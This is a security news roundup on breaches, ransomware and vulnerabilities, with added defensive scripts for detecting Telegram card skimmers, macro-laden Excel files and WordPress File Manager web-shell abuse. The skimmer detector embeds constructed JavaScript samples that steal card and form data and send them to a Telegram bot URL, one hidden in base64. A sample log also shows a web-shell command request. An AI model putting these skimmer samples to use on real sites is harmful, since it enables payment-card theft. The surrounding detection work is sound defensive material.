Round Up of Major Breaches and Scams
Banco Estado detected malicious software on its systems that reportedly affected its platforms. The following is a Google translation of an article that appears at biobiochile.cl; DataBreaches.net was tipped to the breach by @chum1ng0. Banco Estado published a press release this Sunday acknowledging that it detected malicious software in its operating systems, a problem that the bank’s cybersecurity teams identified and have already resolved.
The multinational entertainment and record label conglomerate Warner Music Group (WMG) has reported a cyberattack involving multiple e-commerce websites hosted and supported by an external service provider. The incident may have allowed an ‘unauthorized third party’ to access sensitive customer information, including names, email addresses, phone numbers, billing and shipping addresses, and payment card details (number, expiration date, and CVC/CVV code).
Telmate, a service used by inmates at US prisons to communicate with friends and family, exposed a database containing tens of millions of call logs, private messages, and personal information about inmates and their contacts. The database was left on the web without a password or any other authentication required to access it. Comparitech security researcher Bob Diachenko discovered the unsecured database on August 13, 2020 and immediately reported it to Global Tel Link, the company that owns and operates Telmate.
Magecart attackers have adopted a new web skimming technique that uses the popular messaging app Telegram to exfiltrate stolen card data. According to Malwarebytes, the skimmer code injected into compromised checkout pages sends the harvested payment details to a Telegram account the attackers control. The stolen data therefore leaves the site through a legitimate, widely used service rather than an attacker-registered domain, which makes the exfiltration harder to spot in network traffic and harder to block without also blocking Telegram.
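The practical question for anyone running a checkout page is how to spot this in the scripts the page actually serves. The scanner below is an added example written for this roundup, not Malwarebytes’ code and not a sample taken from a real compromised site. It looks for references to the Telegram Bot API endpoint format (https://api.telegram.org/bot<bot_id>:<token>/…) both in the clear and inside base64 strings, because skimmers routinely hide their exfiltration URL in an encoded string and unwrap it with atob() at runtime (that assumption about obfuscation, the bot id, the token, the chat id and the three sample scripts are all constructed for the demo).

```python
from __future__ import annotations

import base64
import re

# Telegram Bot API calls look like https://api.telegram.org/bot<bot_id>:<token>/sendMessage?chat_id=...
# Capture the numeric bot id so hits across scripts can be correlated.
TELEGRAM_BOT_RE = re.compile(r"api\.telegram\.org/bot(\d+):[A-Za-z0-9_-]+")

# Runs of base64 alphabet long enough to hold an encoded URL (assumption: the skimmer
# hides the endpoint in a base64 string and decodes it with atob() at runtime).
B64_RUN_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def _decoded_base64_runs(script: str):
    """Yield the UTF-8 text of every substring of `script` that decodes as strict base64."""
    for m in B64_RUN_RE.finditer(script):
        try:
            yield base64.b64decode(m.group(0), validate=True).decode("utf-8", "ignore")
        except ValueError:  # binascii.Error is a ValueError: wrong length or padding
            continue


def find_telegram_exfil(script: str) -> list[tuple[str, str]]:
    """Return (encoding, bot_id) for every Telegram Bot API reference in one script,
    whether written in the clear ("plain") or hidden in a base64 string ("base64")."""
    hits = [("plain", m.group(1)) for m in TELEGRAM_BOT_RE.finditer(script)]
    for decoded in _decoded_base64_runs(script):
        hits.extend(("base64", m.group(1)) for m in TELEGRAM_BOT_RE.finditer(decoded))
    return hits


def audit_page_scripts(scripts: dict[str, str]) -> dict[str, list[tuple[str, str]]]:
    """Scan every script served on a page and return only the ones that talk to Telegram."""
    flagged = {}
    for name, src in scripts.items():
        hits = find_telegram_exfil(src)
        if hits:
            flagged[name] = hits
    return flagged


# --- Constructed sample scripts (not from any real site) -----------------------------------
CONSTRUCTED_BOT_URL = "https://api.telegram.org/bot123456789:AAConstructedTokenForThisDemoOnly/sendMessage"

BENIGN_JS = (
    "document.querySelector('#checkout').addEventListener('submit', function () {"
    "  fetch('https://shop.example/api/checkout', {method: 'POST', body: JSON.stringify(collectForm())});"
    "});"
)
# Skimmer with the exfiltration URL in the clear.
PLAIN_JS = (
    "var card = document.querySelector('#cc_number').value;"
    "fetch('" + CONSTRUCTED_BOT_URL + "?chat_id=-1001234&text=' + encodeURIComponent(card));"
)
# Skimmer that hides the URL in base64 and exfiltrates via an image request.
ENCODED_JS = (
    "var _0x1 = atob('" + base64.b64encode(CONSTRUCTED_BOT_URL.encode()).decode() + "');"
    "new Image().src = _0x1 + '?chat_id=-1001234&text=' + encodeURIComponent(btoa(JSON.stringify(collectForm())));"
)

if __name__ == "__main__":
    page = {"checkout.js": BENIGN_JS, "vendor.min.js": PLAIN_JS, "jquery-ui-patch.js": ENCODED_JS}
    for name, hits in audit_page_scripts(page).items():
        print(f"{name}: Telegram exfiltration via bot id(s) {sorted({bot for _, bot in hits})} ({hits[0][0]})")
```

Run it against the scripts your checkout page returns (a headless browser dump of every inline and external script is enough); a hit on a third-party or recently changed file is worth an immediate look at what the script collects. A Content-Security-Policy that limits connect-src and img-src on payment pages to your own origins and your payment processor would stop both of the sample exfiltration paths regardless of how the URL is obfuscated.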
What a weird story about the lengths some folks will go to to deny that they were responsible for a hack. Ax Sharma reports: A hacker group that goes by the names “John Wick” and “Korean Hackers” has provided BleepingComputer with information on the hacking of the Indian Prime Minister’s Twitter account and the online systems of the popular Indian news channel News18. The same group had previously hacked the video-on-demand service ZEE5 and defaced multiple websites, asking for nothing but a “10 Ethereum ‘donation’ for their help.”
Online marketing company View Media left a database holding data on 38 million U.S. users exposed online. According to researchers from CyberNews, the database was hosted on a misconfigured Amazon Web Services (AWS) server, allowing anyone to access personal data such as full names, email addresses, residential addresses, phone numbers, and ZIP codes.
The problems for the popular short-video app TikTok show no sign of subsiding. After a complete ban in India and impending bans in countries such as the U.S. and New Zealand, TikTok is in the soup again over scammers purchasing ads to promote fake mobile apps, diet pills, and other bogus products and services. According to recent research by Tenable, TikTok’s popular ‘#ForYou’ page has become a breeding ground for ad scams.
Round Up of Major Malware and Ransomware Incidents
Argentina’s official immigration agency, Dirección Nacional de Migraciones, is the latest victim of the Netwalker ransomware operators. The attack interrupted border crossings into and out of the country for four hours, and local media report that the operators also exfiltrated sensitive data from the agency.
A newly discovered malware gang is using a clever trick to create malicious Excel files that have low detection rates and a better chance of evading security products. Discovered by security researchers at NVISO Labs, the gang, which they named Epic Manchego, has been active since June, targeting companies all over the world with phishing emails that carry a malicious Excel document. According to NVISO, these were not standard Excel spreadsheets, and that difference is what let them slip past security scanners.
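A triage step that would have helped here is to look at how a macro-enabled workbook was produced rather than only at what its VBA does. NVISO attributed the Epic Manchego documents to the EPPlus .NET library rather than to Microsoft Office (that detail comes from NVISO’s report, not from this page). The script below is an added example written for this roundup, not NVISO’s tooling: it opens an OOXML package (.xlsm is a zip), checks whether a VBA project part is present and declared, reads the generator recorded in docProps/app.xml, and flags the combination “has macros, not generated by Office” as worth a closer look. The heuristic and the minimal sample packages (which are not real, openable workbooks) are constructed for the demo.

```python
from __future__ import annotations

import io
import xml.etree.ElementTree as ET
import zipfile

CT_NS = "http://schemas.openxmlformats.org/package/2006/content-types"
EP_NS = "http://schemas.openxmlformats.org/officeDocument/2006/extended-properties"
VBA_CONTENT_TYPE = "application/vnd.ms-office.vbaProject"


def build_sample_xlsm(application: str, with_vba: bool) -> bytes:
    """Constructed minimal OOXML package for the demo (enough structure to triage, not to open in Excel)."""
    overrides = [
        '<Override PartName="/xl/workbook.xml" '
        'ContentType="application/vnd.ms-excel.sheet.macroEnabled.main+xml"/>',
        '<Override PartName="/docProps/app.xml" '
        'ContentType="application/vnd.openxmlformats-officedocument.extended-properties+xml"/>',
    ]
    if with_vba:
        overrides.append(f'<Override PartName="/xl/vbaProject.bin" ContentType="{VBA_CONTENT_TYPE}"/>')
    content_types = f'<?xml version="1.0" encoding="UTF-8"?><Types xmlns="{CT_NS}">{"".join(overrides)}</Types>'
    app_xml = (f'<?xml version="1.0" encoding="UTF-8"?><Properties xmlns="{EP_NS}">'
               f'<Application>{application}</Application></Properties>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", content_types)
        z.writestr("docProps/app.xml", app_xml)
        z.writestr("xl/workbook.xml", "<workbook/>")
        if with_vba:
            # OLE compound-file magic followed by a stub body; a real vbaProject.bin is an OLE container.
            z.writestr("xl/vbaProject.bin", b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 24)
    return buf.getvalue()


def triage_ooxml(data: bytes) -> dict:
    """Report VBA presence, declared content types and the generating application of an OOXML file."""
    result = {"has_vba_part": False, "vba_declared": False, "macro_enabled_type": False,
              "application": None, "findings": []}
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        names = set(z.namelist())
        result["has_vba_part"] = any(n.lower().endswith("vbaproject.bin") for n in names)
        types = ET.fromstring(z.read("[Content_Types].xml"))
        for override in types.iter(f"{{{CT_NS}}}Override"):
            ctype = override.get("ContentType", "")
            if ctype == VBA_CONTENT_TYPE:
                result["vba_declared"] = True
            if "macroEnabled" in ctype:
                result["macro_enabled_type"] = True
        if "docProps/app.xml" in names:
            app = ET.fromstring(z.read("docProps/app.xml")).find(f"{{{EP_NS}}}Application")
            result["application"] = app.text if app is not None else None

    if result["has_vba_part"]:
        result["findings"].append("contains a VBA project (xl/vbaProject.bin)")
        if not result["vba_declared"]:
            result["findings"].append("VBA part is not declared in [Content_Types].xml")
        generator = result["application"] or ""
        # Heuristic (assumption): Office writes "Microsoft Excel"; a macro-enabled file from
        # another generator is unusual for business documents and deserves a closer look.
        if not generator.startswith("Microsoft"):
            result["findings"].append(f"macro-enabled file generated outside Office: {generator or 'unknown'}")
    return result


if __name__ == "__main__":
    for label, doc in [("library-built .xlsm", build_sample_xlsm("EPPlus", True)),
                       ("Excel-built .xlsm", build_sample_xlsm("Microsoft Excel", True)),
                       ("plain workbook", build_sample_xlsm("Microsoft Excel", False))]:
        print(label, triage_ooxml(doc)["findings"])
```

The generator string is trivially forgeable, so treat a “Microsoft Excel” value as absence of one signal rather than as clearance; the point is that a non-Office generator on a macro-enabled attachment is cheap to check and was a distinguishing property of this campaign.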
The FBI has issued a second flash alert about ProLock ransomware stealing data, four months after its first advisory on the same threat. Private Industry Notification 20200901-001, published on September 1st, follows the MI-000125-MW Flash Alert of May 4th, 2020.
The Haywood County School District in North Carolina has disclosed a data breach after unencrypted files were stolen during a SunCrypt ransomware attack. The attack took place on August 24th, 2020, but at the time the family of malware that infected the district was not revealed.
A new Thanos ransomware strain tries, and fails, to deliver its ransom note by overwriting the Windows master boot record (MBR) of compromised computers. The MBR locker module was discovered by security researchers at Palo Alto Networks’ Unit 42 while analyzing two attacks in which Thanos ransomware affiliates successfully encrypted devices belonging to state-controlled organizations in the Middle East and North Africa in early July 2020.
Round Up of Major Vulnerabilities and Patches
Millions of WordPress sites were probed and attacked this week, Defiant, the company behind the Wordfence web application firewall, said on Friday. The sudden spike in attacks came after hackers discovered and began exploiting a zero-day vulnerability in “File Manager,” a popular WordPress plugin installed on more than 700,000 sites. The zero-day was an unauthenticated file upload vulnerability that allowed an attacker to upload arbitrary files, including PHP web shells, to a site running an older version of the plugin.
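For anyone who had the plugin installed that week, the useful question is whether the probing turned into an upload. The log scanner below is an added example written for this roundup, not Wordfence’s detection logic. It assumes two indicators that come from Wordfence’s public write-up rather than from this page: exploitation was a direct POST to the plugin’s lib/php/ connector scripts (normal administration goes through wp-admin, not those files), and uploaded payloads landed under the plugin’s lib/files/ directory, so a later request for a .php file there is a web shell being used. The Apache-format log lines, IP addresses and the shell.php name are constructed.

```python
from __future__ import annotations

import re

# Apache/nginx "combined" access log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Indicator paths taken from Wordfence's write-up (assumption: not stated on this page).
PLUGIN_DIR = "/wp-content/plugins/wp-file-manager/"
CONNECTOR_DIR = PLUGIN_DIR + "lib/php/"    # direct POSTs here = exploitation attempt
UPLOAD_DIR = PLUGIN_DIR + "lib/files/"     # .php requested here = uploaded web shell in use

# Constructed sample log: one legitimate admin, one successful attacker, one failed probe.
SAMPLE_LOG = """\
198.51.100.23 - - [01/Sep/2020:09:58:01 +0000] "GET /wp-login.php HTTP/1.1" 200 3182 "-" "Mozilla/5.0"
198.51.100.23 - - [01/Sep/2020:09:59:10 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 512 "https://blog.example/wp-admin/" "Mozilla/5.0"
203.0.113.10 - - [01/Sep/2020:10:15:32 +0000] "POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1" 200 734 "-" "python-requests/2.24.0"
203.0.113.10 - - [01/Sep/2020:10:15:33 +0000] "GET /wp-content/plugins/wp-file-manager/lib/files/shell.php?c=id HTTP/1.1" 200 89 "-" "python-requests/2.24.0"
198.51.100.7 - - [01/Sep/2020:10:20:05 +0000] "POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1" 404 215 "-" "curl/7.68.0"
"""


def parse_line(line: str) -> dict | None:
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(entry: dict) -> str | None:
    """Label one request as a connector POST, a hit on an uploaded PHP file, or nothing."""
    path = entry["path"].split("?", 1)[0]
    if entry["method"] == "POST" and path.startswith(CONNECTOR_DIR):
        return "connector_post"
    if path.startswith(UPLOAD_DIR) and path.lower().endswith(".php"):
        return "uploaded_php_hit"
    return None


def detect_file_manager_abuse(log_text: str) -> list[dict]:
    """Group indicator hits per client IP and grade each: probe, upload_likely or webshell_executed."""
    per_ip: dict[str, dict] = {}
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        kind = classify(entry)
        if kind is None:
            continue
        rec = per_ip.setdefault(entry["ip"], {"ip": entry["ip"], "events": []})
        rec["events"].append({"kind": kind, "status": int(entry["status"]),
                              "path": entry["path"], "ts": entry["ts"], "ua": entry["ua"]})

    alerts = []
    for rec in per_ip.values():
        events = rec["events"]
        if any(e["kind"] == "uploaded_php_hit" and e["status"] < 400 for e in events):
            rec["severity"] = "webshell_executed"      # something is answering from lib/files/
        elif any(e["kind"] == "connector_post" and 200 <= e["status"] < 300 for e in events):
            rec["severity"] = "upload_likely"          # connector accepted the request; check lib/files/
        else:
            rec["severity"] = "probe"                  # 404/403: plugin absent, patched or blocked
        alerts.append(rec)
    return alerts


if __name__ == "__main__":
    for alert in detect_file_manager_abuse(SAMPLE_LOG):
        print(alert["ip"], alert["severity"], [e["path"] for e in alert["events"]])
```

A “probe” result still tells you the site was on the attackers’ list; an “upload_likely” with no later .php hit in the log is the case to treat as compromised anyway, since the shell may have been fetched through a path the scanner does not model or not yet at all. Listing lib/files/ on disk is the cheap confirmation.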
WhatsApp has addressed six previously undisclosed flaws in its app and published them on a new dedicated security advisory site, part of a commitment to more transparency about vulnerabilities affecting the app. Some of the vulnerabilities were reported through the Facebook bug-bounty program; the others were found during internal code reviews.
Facebook has published a vulnerability disclosure policy (VDP) this week explaining how it decides when and how to release details of bugs its team finds in third-party software and open-source projects. If the social-media behemoth finds a bug in another platform’s code, the project has 90 days to remediate before Facebook goes public.